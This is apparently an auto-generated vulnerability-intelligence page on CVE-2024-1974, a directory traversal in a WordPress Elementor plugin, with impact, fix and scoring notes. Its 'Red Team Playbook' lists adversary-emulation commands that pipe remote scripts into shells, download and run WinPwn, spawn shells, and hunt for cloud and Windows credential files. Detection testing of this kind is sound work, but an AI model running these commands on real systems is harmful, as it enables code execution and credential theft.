CVE-2024-1974
Overview
This vulnerability is a directory traversal flaw originating from insufficient sanitization of file path inputs within the render function of the HT Mega Addons for Elementor plugin. The affected component improperly processes user-supplied parameters, enabling traversal outside the intended directory scope. This flaw exists in all plugin versions up to and including 2.4.6, specifically impacting the widget rendering mechanism that handles file path references.
Vulnerability Description
The HT Mega – Absolute Addons For Elementor plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 2.4.6 via the render function. This makes it possible for authenticated attackers, with contributor access or higher, to read the contents of arbitrary files on the server, which can contain sensitive information.
Impact
An attacker with at least contributor-level authentication can exploit this flaw to read arbitrary files on the web server, potentially exposing sensitive information such as configuration files, credentials, or other protected data. Since no user interaction beyond authentication is required and the attack can be performed remotely via the plugin’s interface, this elevates the risk of data leakage. The CVSS vector indicates low attack complexity (AC:L) and requires privileges (PR:L), with high impact on confidentiality, integrity, and availability (C:H/I:H/A:H).
Solution
To remediate this vulnerability, update the HT Mega Addons for Elementor plugin to version 2.4.7 or later, where the directory traversal issue has been addressed. Refer to the WordPress plugin repository changelog and the official Wordfence advisory (https://www.wordfence.com/threat-intel/vulnerabilities/id/11b5f0a1-bf22-46be-a165-c62f1077da0f) for detailed patch information. No specific workaround is documented; applying the vendor’s fixed release is the recommended mitigation step.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in the HT Mega – Absolute Addons For Elementor plugin for WordPress is characterized by a directory traversal flaw that allows authenticated users with contributor access or higher to access arbitrary files on the server. This vulnerability arises from improper validation of user input within the render function of the plugin, which fails to sanitize file paths adequately. As a result, attackers can manipulate the file path to traverse the directory structure and access sensitive files, such as configuration files, database credentials, or other critical data stored on the server. The potential for unauthorized access to such information poses a significant risk to the integrity and confidentiality of the web application and its underlying infrastructure.
Exploitation of this vulnerability can occur through various attack vectors. An authenticated attacker, who has gained access to the WordPress site with sufficient privileges, can craft specific requests that exploit the directory traversal flaw. For instance, by appending directory traversal sequences (e.g., "../") to the file path parameter, the attacker can navigate outside the intended directory and retrieve files that should not be accessible. This exploitation can be executed through a simple HTTP request, making it a low-barrier attack for those with basic technical skills. The ability to read sensitive files can lead to further attacks, including privilege escalation, data theft, or even complete server compromise if critical files are exposed.
The real-world impact of this vulnerability can be substantial, particularly for businesses that rely on the affected plugin for their WordPress sites. The exposure of sensitive information can lead to data breaches, resulting in financial losses, reputational damage, and potential legal ramifications. Organizations may face compliance issues if they fail to protect sensitive data, especially in regulated industries where data protection is mandated. Furthermore, the presence of this vulnerability can undermine customer trust, as users may be concerned about the security of their personal information and the overall integrity of the website. The cascading effects of such breaches can be detrimental, leading to loss of business, increased costs for remediation, and potential fines from regulatory bodies.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regular security assessments, including vulnerability scanning and penetration testing, can help identify and remediate weaknesses in their web applications. Additionally, keeping the HT Mega plugin and all other components of the WordPress environment up to date is crucial, as updates often include patches for known vulnerabilities. Implementing strict access controls and the principle of least privilege can also minimize the risk of exploitation by limiting the number of users with contributor access or higher. Furthermore, employing web application firewalls (WAFs) can provide an additional layer of security by filtering out malicious requests that attempt to exploit such vulnerabilities.
In conclusion, the directory traversal vulnerability in the HT Mega – Absolute Addons For Elementor plugin represents a significant threat to WordPress sites, particularly those with inadequate security measures. The potential for unauthorized file access can lead to severe consequences for organizations, highlighting the importance of proactive security practices. By adopting a comprehensive security strategy that includes regular updates, access control measures, and continuous monitoring, organizations can mitigate the risks associated with this vulnerability and protect their digital assets effectively.
The CVSS score for CVE-2024-1974 has been revised upward from 6.5 to 8.8, reflecting a reassessment of the vulnerability’s impact and exploitability. This adjustment indicates a heightened recognition of the risk posed by the directory traversal flaw in the HT Mega – Absolute Addons For Elementor plugin, particularly given that authenticated users with contributor-level access can leverage it to access sensitive server files. Although our telemetry shows no emergence of new exploit techniques or a surge in exploitation attempts, the elevated severity score underscores the critical nature of this vulnerability within WordPress environments. Defenders should interpret this change as an increased priority for detection and response efforts, as the potential for data exposure and subsequent compromise is more severe than previously assessed. The stable EPSS score suggests that while exploitation activity has not intensified, the vulnerability remains a significant threat vector that warrants continued vigilance.
Update 2 — June 13, 2026
The CVSS score adjustment from 8.8 to 6.5 for CVE-2024-1974 reflects a refined understanding of the vulnerability’s exploitability and impact based on evolving threat intelligence. Our telemetry indicates that while the vulnerability remains exploitable by authenticated users with contributor-level access, the risk of widespread exploitation or automated attack campaigns has not materialized as initially feared. The stable EPSS score corroborates this assessment, showing no significant uptick in exploitation attempts or proof-of-concept developments. This recalibration signifies that although the vulnerability still poses a meaningful risk of sensitive data exposure within WordPress environments, the immediate threat level is moderate rather than high. Defenders should interpret this update as a signal to maintain vigilance but recognize that the urgency for emergency response has diminished relative to prior evaluations.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Hasthemes | Ht Mega | All |
cpe:2.3:a:hasthemes:ht_mega:*:*:*:*:free:wordpress:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-1974 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/11b5f0a1-bf22-46be-a165-c62f1077da0f?source=cve |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/browser/ht-mega-for-elementor/trunk/includes/widgets/htmega_weather.php#L401 |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/changeset/3048999/ht-mega-for-elementor/tags/2.4.7/includes/widgets/htmega_weather.php?old=2939273&old_path=ht-mega-for-elementor/trunk/includes/widgets/htmega_weather.php |